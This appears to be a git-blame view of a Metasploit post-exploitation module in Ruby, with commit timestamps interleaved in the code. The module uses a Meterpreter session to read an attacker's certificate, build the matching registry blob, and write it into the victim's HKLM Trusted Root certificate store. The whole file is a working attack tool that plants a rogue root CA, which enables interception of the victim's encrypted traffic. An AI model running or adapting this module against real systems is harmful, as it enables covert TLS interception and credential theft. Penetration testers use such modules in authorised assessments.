2011-10-23 17:17:32 +00:00
|
|
|
##
|
|
|
|
|
# $Id$
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
##
|
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
|
# http://metasploit.com/
|
2011-10-23 17:17:32 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
|
super(update_info(info,
|
2012-02-20 19:49:23 +00:00
|
|
|
'Name' => 'Windows Manage Certificate Authority Injection',
|
2011-10-23 17:17:32 +00:00
|
|
|
'Description' => %q{
|
|
|
|
|
This module allows the attacker to insert an arbitrary CA certificate
|
|
|
|
|
into the victim's Trusted Root store.
|
|
|
|
|
},
|
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
|
'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
|
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
|
'Platform' => [ 'windows' ],
|
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
|
))
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
OptString.new('CAFILE', [ true, 'Path to the certificate you wish to install as a Trusted Root CA.', ''])
|
|
|
|
|
], self.class)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def run
|
|
|
|
|
certfile = datastore['CAFILE']
|
|
|
|
|
|
|
|
|
|
# Check file path
|
|
|
|
|
begin
|
|
|
|
|
::File.stat(certfile)
|
|
|
|
|
rescue
|
|
|
|
|
print_error("CAFILE not found")
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
cert = ''
|
|
|
|
|
|
|
|
|
|
# Load the file
|
|
|
|
|
f = ::File.open(certfile, 'rb')
|
|
|
|
|
cert = f.read(f.stat.size)
|
|
|
|
|
f.close
|
|
|
|
|
|
|
|
|
|
loadedcert = OpenSSL::X509::Certificate.new(cert)
|
|
|
|
|
certmd5 = Digest::MD5.hexdigest(loadedcert.to_der).scan(/../)
|
|
|
|
|
certsha1 = Digest::SHA1.hexdigest(loadedcert.to_der).scan(/../)
|
|
|
|
|
cskiray = loadedcert.extensions[0].value.gsub(/:/,'').scan(/../)
|
|
|
|
|
|
|
|
|
|
derLength = loadedcert.to_der.length.to_s(16)
|
|
|
|
|
if (derLength.length < 4)
|
|
|
|
|
derLength = "0#{derLength}"
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
derRay = derLength.scan(/../)
|
|
|
|
|
hexDerLength = [ derRay[1], derRay[0] ]
|
|
|
|
|
|
|
|
|
|
certder = loadedcert.to_der.each_byte.collect {|val| "%02X" % val}
|
|
|
|
|
|
|
|
|
|
bblob = [ "04", "00", "00", "00", "01", "00", "00", "00", "10", "00", "00", "00" ]
|
|
|
|
|
bblob += certmd5
|
|
|
|
|
bblob += [ "03", "00", "00", "00", "01", "00", "00", "00", "14", "00", "00", "00" ]
|
|
|
|
|
bblob += certsha1
|
|
|
|
|
bblob += [ "14", "00", "00", "00", "01", "00", "00", "00", "14", "00", "00", "00" ]
|
|
|
|
|
bblob += cskiray
|
|
|
|
|
bblob += [ "20", "00", "00", "00", "01", "00", "00", "00" ]
|
|
|
|
|
bblob += hexDerLength
|
|
|
|
|
bblob += [ "00", "00" ]
|
|
|
|
|
bblob += certder
|
|
|
|
|
|
|
|
|
|
blob = bblob.map(&:hex).pack("C*")
|
|
|
|
|
|
|
|
|
|
cleancertsha1 = certsha1.to_s.gsub(/[\s\[\\\"\]]/,'').gsub(/,/,'').upcase
|
|
|
|
|
catree = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates"
|
|
|
|
|
entire_key = "#{catree}\\#{cleancertsha1}"
|
|
|
|
|
root_key, base_key = client.sys.registry.splitkey(entire_key)
|
|
|
|
|
|
|
|
|
|
# Perform the registry operations
|
|
|
|
|
|
|
|
|
|
# Ensure the cert doesn't already exist
|
|
|
|
|
begin
|
|
|
|
|
open_key = nil
|
|
|
|
|
open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ + 0x0000)
|
|
|
|
|
values = open_key.enum_value
|
|
|
|
|
if (values.length > 0)
|
|
|
|
|
print_error("Key already exists!")
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
rescue
|
|
|
|
|
open_key = nil
|
|
|
|
|
open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE + 0x0000)
|
|
|
|
|
print_status("Successfully created key: #{entire_key}")
|
|
|
|
|
|
|
|
|
|
open_key.set_value('Blob', REG_BINARY, blob)
|
|
|
|
|
print_good("CA inserted!")
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|
